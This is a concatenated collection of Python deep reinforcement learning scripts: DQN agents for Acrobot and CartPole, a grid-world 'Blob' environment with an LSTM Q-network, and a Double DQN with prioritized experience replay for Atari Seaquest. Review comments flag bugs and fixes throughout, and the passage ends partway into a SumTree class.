            print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
        # train once per episode when enough samples are available
        if len(agent.memory) > batch_size:
            agent.replay(batch_size)
    agent.save("AcroBot_v1.h5")
    plt.plot(list(range(EPISODES)), avg_rewards)
    plt.show()
import os
# force CPU execution: hide all CUDA devices from TensorFlow
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"  # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# NOTE(review): `config` is never passed to a tf.Session in this excerpt —
# confirm it is used elsewhere, otherwise it has no effect.
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                         'GPU' : 0}
                        )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
# hyperparameters for the CartPole run below
EPISODES = 1000
REPLAY_MEMORY_MAX = 5000
SHOW_EVERY = 100
class DQNAgent:
    """Single-network DQN agent (no separate target model) for vector
    observations such as CartPole's 4-dimensional state."""
    def __init__(self, state_size, action_size):
        self.state_size = state_size
        self.action_size = action_size
        self.memory = deque(maxlen=REPLAY_MEMORY_MAX)  # experience replay buffer
        # discount rate
        self.gamma = 0.95
        # exploration rate
        self.epsilon = 1.0
        self.epsilon_min = 0.01
        self.epsilon_decay = 0.995
        self.learning_rate = 0.001
        # model to be built
        self.model = None
        self.build_model()
    def build_model(self):
        """Builds the DQN Model"""
        # Neural network for Deep-Q Learning Model
        model = Sequential()
        model.add(Dense(24, input_dim=self.state_size, activation="relu"))
        model.add(Dense(24, activation="relu"))
        # output layer
        model.add(Dense(self.action_size, activation="linear"))
        model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
        self.model = model
    def remember(self, state, action, reward, next_state, done):
        """Adds a sample to the memory"""
        self.memory.append((state, action, reward, next_state, done))
    def act(self, state):
        """Takes action using Epsilon-Greedy Policy"""
        if np.random.random() <= self.epsilon:
            return random.randint(0, self.action_size-1)
        else:
            act_values = self.model.predict(state)
            # print("act_values:", act_values.shape)
            return np.argmax(act_values[0])
    def replay(self, batch_size):
        """Train on a replay memory with a batch_size of samples"""
        minibatch = random.sample(self.memory, batch_size)
        for state, action, reward, next_state, done in minibatch:
            target = reward
            if not done:
                # bootstrap from the same online network (no target net here)
                target = ( reward + self.gamma * np.max(self.model.predict(next_state)[0]) )
            target_f = self.model.predict(state)
            target_f[0][action] = target
            self.model.fit(state, target_f, epochs=1, verbose=0)
        # decay epsilon if possible
        self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
    def load(self, name):
        """Load model weights from *name*."""
        self.model.load_weights(name)
    def save(self, name):
        """Save model weights to *name*."""
        self.model.save_weights(name)
if __name__ == "__main__":
    env = gym.make("CartPole-v1")
    state_size = env.observation_space.shape[0]
    action_size = env.action_space.n
    agent = DQNAgent(state_size=state_size, action_size=action_size)
    done = False
    batch_size = 32
    scores = []
    avg_scores = []
    avg_score = 0
    for e in range(EPISODES):
        state = env.reset()
        state = np.reshape(state, (1, state_size))
        for t in range(500):
            action = agent.act(state)
            # print(action)
            next_state, reward, done, info = env.step(action)
            # punish if not yet finished
            reward = reward if not done else -10
            next_state = np.reshape(next_state, (1, state_size))
            agent.remember(state, action, reward, next_state, done)
            state = next_state
            if done:
                print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
                break
            if e % SHOW_EVERY == 0:
                env.render()
            # train every step once enough samples were gathered
            # (note: epsilon decays on every replay() call)
            if len(agent.memory) > batch_size:
                agent.replay(batch_size)
        # survival time (last step index reached) is the episode score
        scores.append(t)
        avg_score = np.average(scores)
        avg_scores.append(avg_score)
    agent.save("v1.h5")
    plt.plot(list(range(EPISODES)), avg_scores)
    plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
# hyperparameters for the multi-enemy Blob DQN below
DISCOUNT = 0.96
REPLAY_MEMORY_SIZE = 50_000  # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000  # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32  # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5  # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
MIN_REWARD = -200  # For model save
# NOTE(review): MIN_REWARD appears unused — the save threshold in the
# training loop hard-codes -220; confirm which is intended.
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 50_000
# Exploration settings
epsilon = 1.0  # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01
# Stats settings
AGGREGATE_STATS_EVERY = 100  # episodes
SHOW_PREVIEW = False
class Blob:
    """A point-like agent on a square grid of side ``size``.

    Spawns at a uniformly random cell; supports relative movement with
    clamping at the grid edges, subtraction (relative offset) and
    positional equality.
    """

    def __init__(self, size):
        self.size = size
        self.x = np.random.randint(0, size)
        self.y = np.random.randint(0, size)

    def __str__(self):
        return f"Blob ({self.x}, {self.y})"

    def __sub__(self, other):
        # Offset of this blob relative to *other* as a (dx, dy) tuple.
        return (self.x - other.x, self.y - other.y)

    def __eq__(self, other):
        # Blobs compare equal when they occupy the same cell.
        return (self.x, self.y) == (other.x, other.y)

    def action(self, choice):
        """Apply a discrete movement action (0..3 = +x, -x, +y, -y);
        any other value is a no-op."""
        deltas = {0: (1, 0), 1: (-1, 0), 2: (0, 1), 3: (0, -1)}
        if choice in deltas:
            dx, dy = deltas[choice]
            self.move(x=dx, y=dy)

    def move(self, x=False, y=False):
        """Translate by (x, y); a component of False means a random
        step in [-1, 1] along that axis.  Clamps to the grid."""
        self.x += np.random.randint(-1, 2) if x is False else x
        self.y += np.random.randint(-1, 2) if y is False else y
        # keep the blob inside [0, size-1] on both axes
        self.x = min(max(self.x, 0), self.size - 1)
        self.y = min(max(self.y, 0), self.size - 1)
class BlobEnv:
    """Grid-world with one player, one food tile and ``n_enemies`` enemy
    tiles.  Observations are either a rendered RGB image (RETURN_IMAGES)
    or the flat list of every blob's coordinates."""
    SIZE = 20
    RETURN_IMAGES = False
    MOVE_PENALTY = 1
    ENEMY_PENALTY = 300
    FOOD_REWARD = 25
    # if RETURN_IMAGES:
    #     OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3)  # 4
    # else:
    #     OBSERVATION_SPACE_VALUES = (4,)
    ACTION_SPACE_SIZE = 4
    PLAYER_N = 1  # player key in dict
    FOOD_N = 2  # food key in dict
    ENEMY_N = 3  # enemy key in dict
    # the dict! (colors)
    d = {1: (255, 175, 0),
         2: (0, 255, 0),
         3: (0, 0, 255)}
    def __init__(self, n_enemies=7):
        self.n_enemies = n_enemies
        # reset once so the flat-observation length is known up front
        self.n_states = len(self.reset())
    def reset(self):
        """Re-spawn all blobs (no overlaps) and return the first observation."""
        self.enemies = []
        self.player = Blob(self.SIZE)
        self.food = Blob(self.SIZE)
        while self.food == self.player:
            self.food = Blob(self.SIZE)
        for i in range(self.n_enemies):
            enemy = Blob(self.SIZE)
            while enemy == self.player or enemy == self.food:
                enemy = Blob(self.SIZE)
            self.enemies.append(enemy)
        self.episode_step = 0
        if self.RETURN_IMAGES:
            observation = np.array(self.get_image())
        else:
            # all blob's coordinates
            observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
        return observation
    def step(self, action):
        """Apply *action* to the player; returns (observation, reward, done)."""
        self.episode_step += 1
        self.player.action(action)
        #### MAYBE ###
        #enemy.move()
        #food.move()
        ##############
        if self.RETURN_IMAGES:
            new_observation = np.array(self.get_image())
        else:
            new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
        # set the reward to move penalty by default
        reward = -self.MOVE_PENALTY
        if self.player == self.food:
            # if the player hits the food, good reward
            reward = self.FOOD_REWARD
        else:
            for enemy in self.enemies:
                if enemy == self.player:
                    # if the player hits one of the enemies, heavy punishment
                    reward = -self.ENEMY_PENALTY
                    break
        # episode ends on food, on an enemy hit, or after 200 steps
        done = False
        if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
            done = True
        return new_observation, reward, done
    def render(self):
        """Show the rendered grid in an OpenCV window."""
        img = self.get_image()
        img = img.resize((300, 300))  # resizing so we can see our agent in all its glory.
        cv2.imshow("image", np.array(img))  # show it!
        cv2.waitKey(1)
    # FOR CNN #
    def get_image(self):
        """Render the grid as a SIZE x SIZE RGB PIL image."""
        env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8)  # starts an rbg of our size
        env[self.food.x][self.food.y] = self.d[self.FOOD_N]  # sets the food location tile to green color
        for enemy in self.enemies:
            # BUG FIX: was `self.d[ENEMY_N]`, referencing an undefined global;
            # the colour key is a class attribute.
            env[enemy.x][enemy.y] = self.d[self.ENEMY_N]  # sets the enemy location to red
        env[self.player.x][self.player.y] = self.d[self.PLAYER_N]  # sets the player tile to blue
        img = Image.fromarray(env, 'RGB')  # reading to rgb. Apparently. Even tho color definitions are bgr. ???
        return img
env = BlobEnv()
# For stats
ep_rewards = [-200]
# For more repetitive results (reproducible runs)
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when training multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
    os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
    """Keras TensorBoard callback adapted for RL: keeps one writer and a
    manually-advanced global step across many short .fit() calls."""
    # Overriding init to set initial step and writer (we want one log file for all .fit() calls)
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.step = 1
        self.writer = tf.summary.FileWriter(self.log_dir)
    # Overriding this method to stop creating default log writer
    def set_model(self, model):
        pass
    # Overrided, saves logs with our step number
    # (otherwise every .fit() will start writing from 0th step)
    def on_epoch_end(self, epoch, logs=None):
        self.update_stats(**logs)
    # Overrided
    # We train for one batch only, no need to save anything at epoch end
    def on_batch_end(self, batch, logs=None):
        pass
    # Overrided, so won't close writer
    def on_train_end(self, _):
        pass
    # Custom method for saving own metrics
    # Creates writer, writes custom metrics and closes writer
    def update_stats(self, **stats):
        self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
    """DQN agent whose online/target networks are either a CNN over image
    states or a stacked LSTM over the flat coordinate vector (treated as
    length-1 sequences via expand_dims(axis=1)).

    NOTE(review): the image branch reads env.OBSERVATION_SPACE_VALUES,
    which is commented out on BlobEnv above — state_in_image=True would
    raise AttributeError; confirm before enabling it.
    """
    def __init__(self, state_in_image=True):
        self.state_in_image = state_in_image
        # Main model
        self.model = self.create_model()
        # Target network
        self.target_model = self.create_model()
        self.target_model.set_weights(self.model.get_weights())
        # An array with last n steps for training
        self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
        # Custom tensorboard object
        self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
        # Used to count when to update target network with main network's weights
        self.target_update_counter = 0
    def create_model(self):
        """Build the Q-network: CNN for images, 3-layer LSTM otherwise."""
        # get the NN input length
        model = Sequential()
        if self.state_in_image:
            model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES))  # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
            model.add(Activation('relu'))
            model.add(MaxPooling2D(pool_size=(2, 2)))
            model.add(Dropout(0.2))
            model.add(Conv2D(256, (3, 3)))
            model.add(Activation('relu'))
            model.add(MaxPooling2D(pool_size=(2, 2)))
            model.add(Dropout(0.2))
            model.add(Flatten())  # this converts our 3D feature maps to 1D feature vectors
            model.add(Dense(32))
        else:
            # model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
            # model.add(Dense(32, activation="relu"))
            # model.add(Dropout(0.2))
            # model.add(Dense(32, activation="relu"))
            # model.add(Dropout(0.2))
            model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
            model.add(Dropout(0.3))
            model.add(LSTM(128, activation="relu", return_sequences=True))
            model.add(Dropout(0.3))
            model.add(LSTM(128, activation="relu", return_sequences=False))
            model.add(Dropout(0.3))
        model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear'))  # ACTION_SPACE_SIZE = how many choices (9)
        model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
        return model
    # Adds step's data to a memory replay array
    # (observation space, action, reward, new observation space, done)
    def update_replay_memory(self, transition):
        self.replay_memory.append(transition)
    # Trains main network every step during episode
    def train(self, terminal_state, step):
        # Start training only if certain number of samples is already saved
        if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
            return
        # Get a minibatch of random samples from memory replay table
        minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
        # Get current states from minibatch, then query NN model for Q values
        if self.state_in_image:
            current_states = np.array([transition[0] for transition in minibatch])/255
        else:
            current_states = np.array([transition[0] for transition in minibatch])
        # expand_dims(..., axis=1) makes each state a length-1 sequence for the LSTM
        current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))
        # Get future states from minibatch, then query NN model for Q values
        # When using target network, query it, otherwise main network should be queried
        if self.state_in_image:
            new_current_states = np.array([transition[3] for transition in minibatch])/255
        else:
            new_current_states = np.array([transition[3] for transition in minibatch])
        future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))
        X = []
        y = []
        # Now we need to enumerate our batches
        for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
            # If not a terminal state, get new q from future states, otherwise set it to 0
            # almost like with Q Learning, but we use just part of equation here
            if not done:
                max_future_q = np.max(future_qs_list[index])
                new_q = reward + DISCOUNT * max_future_q
            else:
                new_q = reward
            # Update Q value for given state
            current_qs = current_qs_list[index]
            current_qs[action] = new_q
            # And append to our training data
            X.append(current_state)
            y.append(current_qs)
        # Fit on all samples as one batch, log only on terminal state
        if self.state_in_image:
            self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
        else:
            # self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
            self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
        # Update target network counter every episode
        if terminal_state:
            self.target_update_counter += 1
        # If counter reaches set value, update target network with weights of main network
        if self.target_update_counter > UPDATE_TARGET_EVERY:
            self.target_model.set_weights(self.model.get_weights())
            self.target_update_counter = 0
    # Queries main network for Q values given current observation space (environment state)
    def get_qs(self, state):
        if self.state_in_image:
            return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
        else:
            # return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
            return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
    # Update tensorboard step every episode
    agent.tensorboard.step = episode
    # Restarting episode - reset episode reward and step number
    episode_reward = 0
    step = 1
    # Reset environment and get initial state
    current_state = env.reset()
    # Reset flag and start iterating until episode ends
    done = False
    while not done:
        # This part stays mostly the same, the change is to query a model for Q values
        if np.random.random() > epsilon:
            # Get action from Q table
            action = np.argmax(agent.get_qs(current_state))
        else:
            # Get random action
            action = np.random.randint(0, env.ACTION_SPACE_SIZE)
        new_state, reward, done = env.step(action)
        # Transform new continous state to new discrete state and count reward
        episode_reward += reward
        if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
            env.render()
        # Every step we update replay memory and train main network
        agent.update_replay_memory((current_state, action, reward, new_state, done))
        agent.train(done, step)
        current_state = new_state
        step += 1
    # Append episode reward to a list and log stats (every given number of episodes)
    ep_rewards.append(episode_reward)
    if not episode % AGGREGATE_STATS_EVERY or episode == 1:
        average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
        min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
        max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
        agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
        # Save model, but only when the rolling AVERAGE reward clears the threshold
        if average_reward >= -220:
            agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
    # Decay epsilon
    if epsilon > MIN_EPSILON:
        epsilon *= EPSILON_DECAY
        epsilon = max(MIN_EPSILON, epsilon)
# final save reuses the stats from the last aggregation window
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy
import tensorflow as tf
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
# preprocessed frame geometry and training constants for the Seaquest DQN
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
IMAGE_STACK = 2  # number of consecutive frames stacked into one state
HUBER_LOSS_DELTA = 2.0
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
    """TensorBoard callback adapted for RL training loops: one persistent
    writer and a manually-advanced step shared across many .fit() calls."""
    def __init__(self, **kwargs):
        """
        Overriding init to set initial step and writer (one log file for multiple .fit() calls)
        """
        super().__init__(**kwargs)
        self.step = 1
        self.writer = tf.summary.FileWriter(self.log_dir)
    def set_model(self, model):
        """
        Overriding this method to stop creating default log writer
        """
        pass
    def on_epoch_end(self, epoch, logs=None):
        """
        Overrided, saves logs with our step number
        (if this is not overrided, every .fit() call will start from 0th step)
        """
        self.update_stats(**logs)
    def on_batch_end(self, batch, logs=None):
        """
        Overrided, we train for one batch only, no need to save anything on batch end
        """
        pass
    def on_train_end(self, _):
        """
        Overrided, we don't close the writer
        """
        pass
    def update_stats(self, **stats):
        """
        Custom method for saving own metrics
        Creates writer, writes custom metrics and closes writer
        """
        self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
def huber_loss(y_true, y_pred):
    """Huber loss with delta = HUBER_LOSS_DELTA: quadratic for small
    errors, linear for large ones (robust to outlier TD errors).

    NOTE(review): `K` (the Keras backend) is not imported anywhere visible
    in this file — confirm `from keras import backend as K` exists,
    otherwise this raises NameError when called.
    """
    err = y_true - y_pred
    cond = K.abs(err) < HUBER_LOSS_DELTA
    L2 = 0.5 * K.square(err)
    L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
    loss = tf.where(cond, L2, L1)   # Keras does not cover where function in tensorflow :-(
    return K.mean(loss)
def processImage( img ):
    """Downscale a raw RGB frame to IMAGE_WIDTH x IMAGE_HEIGHT grayscale
    scaled into [-1, 1).

    NOTE(review): scipy.misc.imresize was removed in SciPy 1.3 — this
    requires an old SciPy (with Pillow installed) or a port to PIL/cv2.
    """
    rgb = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
    r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
    gray = 0.2989 * r + 0.5870 * g + 0.1140 * b     # extract luminance
    o = gray.astype('float32') / 128 - 1    # normalize
    return o
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
# tag used in TensorBoard log dirs and saved-model filenames
model_name = "conv2dx3"
class Brain:
    """Holds the main and target Q-networks for the Double DQN and routes
    training/prediction to the right one."""
    def __init__(self, stateCnt, actionCnt):
        self.stateCnt = stateCnt
        self.actionCnt = actionCnt
        self.model = self._createModel()
        self.model_ = self._createModel()  # target network
        # custom tensorboard
        self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
    def _createModel(self):
        """Build the DeepMind-style convolutional Q-network."""
        model = Sequential()
        model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
        model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
        model.add(Conv2D(64, (3, 3), activation='relu'))
        model.add(Flatten())
        model.add(Dense(units=512, activation='relu'))
        # BUG FIX: was `units=actionCnt` — a global that only exists after the
        # __main__ section runs; use the instance attribute instead.
        model.add(Dense(units=self.actionCnt, activation='linear'))
        opt = RMSprop(lr=LEARNING_RATE)
        model.compile(loss=huber_loss, optimizer=opt)
        return model
    def train(self, x, y, epochs=1, verbose=0):
        """Fit the main network on one minibatch, logging to TensorBoard."""
        self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
    def predict(self, s, target=False):
        """Predict Q values with the target network when *target* else the main one."""
        if target:
            return self.model_.predict(s)
        else:
            return self.model.predict(s)
    def predictOne(self, s, target=False):
        """Predict Q values for a single stacked-frame state, flattened."""
        return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
    def updateTargetModel(self):
        """Copy the main network's weights into the target network."""
        self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory:   # stored as ( s, a, r, s_ ) in SumTree
    """Prioritized experience replay buffer backed by a SumTree."""
    e = 0.01  # keeps zero-error samples at a non-zero priority
    a = 0.6   # prioritization exponent

    def __init__(self, capacity):
        self.tree = SumTree(capacity)

    def _getPriority(self, error):
        return (error + self.e) ** self.a

    def add(self, error, sample):
        # Store the sample under a priority derived from its TD error.
        self.tree.add(self._getPriority(error), sample)

    def sample(self, n):
        """Draw *n* samples, one from each equal-probability segment
        of the cumulative priority range."""
        segment = self.tree.total() / n
        picks = []
        for i in range(n):
            lo, hi = segment * i, segment * (i + 1)
            idx, _, data = self.tree.get(random.uniform(lo, hi))
            picks.append((idx, data))
        return picks

    def update(self, idx, error):
        # Refresh a stored sample's priority after it has been re-evaluated.
        self.tree.update(idx, self._getPriority(error))
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000  # replay buffer size (SumTree leaf count)
BATCH_SIZE = 32
GAMMA = 0.95  # discount factor
MAX_EPSILON = 1
MIN_EPSILON = 0.05
EXPLORATION_STOP = 500_000   # at this step epsilon will be 0.01
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000  # steps between target-network syncs
UPDATE_STATS_EVERY = 5  # episodes between TensorBoard dumps / model saves
RENDER_EVERY = 50  # render every Nth episode
class Agent:
    """Double-DQN agent with prioritized experience replay."""
    steps = 0
    epsilon = MAX_EPSILON
    def __init__(self, stateCnt, actionCnt, brain):
        self.stateCnt = stateCnt
        self.actionCnt = actionCnt
        self.brain = brain
        # NOTE: self.memory is attached externally (copied from the
        # RandomAgent after the warm-up phase in __main__).
        # self.memory = Memory(MEMORY_CAPACITY)
    def act(self, s):
        """Epsilon-greedy action selection."""
        if random.random() < self.epsilon:
            return random.randint(0, self.actionCnt-1)
        else:
            return numpy.argmax(self.brain.predictOne(s))
    def observe(self, sample):  # in (s, a, r, s_) format
        """Store a transition with its initial TD-error priority, sync the
        target network periodically, and decay epsilon."""
        x, y, errors = self._getTargets([(0, sample)])
        self.memory.add(errors[0], sample)
        if self.steps % UPDATE_TARGET_FREQUENCY == 0:
            self.brain.updateTargetModel()
        # slowly decrease Epsilon based on our experience
        self.steps += 1
        self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)
    def _getTargets(self, batch):
        """Compute (inputs, targets, TD errors) for a batch of
        (tree_index, (s, a, r, s_)) entries; terminal s_ is None."""
        no_state = numpy.zeros(self.stateCnt)
        states = numpy.array([ o[1][0] for o in batch ])
        states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
        # BUG FIX: these three calls previously went through the module-level
        # `agent` object instead of `self`.
        p = self.brain.predict(states)
        p_ = self.brain.predict(states_, target=False)       # main net picks the argmax action
        pTarget_ = self.brain.predict(states_, target=True)  # target net evaluates it
        x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
        y = numpy.zeros((len(batch), self.actionCnt))
        errors = numpy.zeros(len(batch))
        for i in range(len(batch)):
            o = batch[i][1]
            # BUG FIX: this line was `s = o[0] a = o[1] r = o[2] s_ = o[3]`,
            # which is a SyntaxError; unpack the transition properly.
            s, a, r, s_ = o
            t = p[i]
            oldVal = t[a]
            if s_ is None:
                t[a] = r
            else:
                t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ]  # double DQN
            x[i] = s
            y[i] = t
            errors[i] = abs(oldVal - t[a])
        return (x, y, errors)
    def replay(self):
        """Sample a prioritized minibatch, refresh its priorities, train."""
        batch = self.memory.sample(BATCH_SIZE)
        x, y, errors = self._getTargets(batch)
        # update errors
        for i in range(len(batch)):
            idx = batch[i][0]
            self.memory.update(idx, errors[i])
        self.brain.train(x, y)
class RandomAgent:
    """Uniform-random policy used only to pre-fill the replay memory."""
    memory = Memory(MEMORY_CAPACITY)
    exp = 0
    epsilon = MAX_EPSILON

    def __init__(self, actionCnt, brain):
        self.actionCnt = actionCnt
        self.brain = brain

    def act(self, s):
        # Ignore the state entirely; pick any action uniformly.
        return random.randint(0, self.actionCnt - 1)

    def observe(self, sample):  # in (s, a, r, s_) format
        # Priority is seeded from |reward| since no TD error exists yet.
        self.memory.add(abs(sample[2]), sample)
        self.exp += 1

    def replay(self):
        # The random agent never learns.
        pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
    """Wraps an OpenGym Atari env: stacks the last two preprocessed frames
    as the agent state, clips rewards, and logs episode statistics."""
    def __init__(self, problem):
        self.problem = problem
        self.env = gym.make(problem)
        self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)  # rolling reward window
    def run(self, agent, step):
        """Play one full episode with *agent*; returns the rolling average reward."""
        img = self.env.reset()
        w = processImage(img)
        s = numpy.array([w, w])  # initial state: the first frame duplicated
        agent.brain.tensorboard.step = step
        R = 0
        while True:
            if step % RENDER_EVERY == 0:
                self.env.render()
            a = agent.act(s)
            img, r, done, info = self.env.step(a)
            s_ = numpy.array([s[1], processImage(img)]) #last two screens
            # BUG FIX: was `np.clip(...)` but this module imports `numpy`,
            # not `np` — that raised NameError on the first step.
            r = numpy.clip(r, -1, 1)   # clip reward to [-1, 1]
            if done: # terminal state
                s_ = None
            agent.observe( (s, a, r, s_) )
            agent.replay()
            s = s_
            R += r
            if done:
                break
        self.ep_rewards.append(R)
        avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
        if step % UPDATE_STATS_EVERY == 0:
            min_reward = min(self.ep_rewards)
            max_reward = max(self.ep_rewards)
            agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
            agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:2f}.h5")
        # print("Total reward:", R)
        return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
    print("Initialization with random agent...")
    # warm-up phase: fill the replay memory with random-policy transitions
    while randomAgent.exp < MEMORY_CAPACITY:
        step += 1
        env.run(randomAgent, step)
        print(randomAgent.exp, "/", MEMORY_CAPACITY)
    # hand the pre-filled memory to the learning agent
    agent.memory = randomAgent.memory
    randomAgent = None
    print("Starting learning")
    for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
        env.run(agent, i)
finally:
    # always persist the model, even on Ctrl-C or a crash
    agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
    """
    This SumTree code is modified version of Morvan Zhou:
    https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py

    Array-backed binary tree: leaves store per-experience priorities,
    internal nodes store the sum of their children, so sampling a value
    in [0, total_priority) maps to a leaf in O(log n).
    """
    data_pointer = 0  # next leaf slot to (over)write

    def __init__(self, length):
        # number of leaf nodes (final nodes that contain experiences)
        self.length = length
        # full binary tree: `length` leaves + (length - 1) internal nodes
        self.tree = np.zeros(2*self.length - 1)
        # experience payloads, parallel to the leaves
        self.data = np.zeros(self.length, dtype=object)

    def add(self, priority, data):
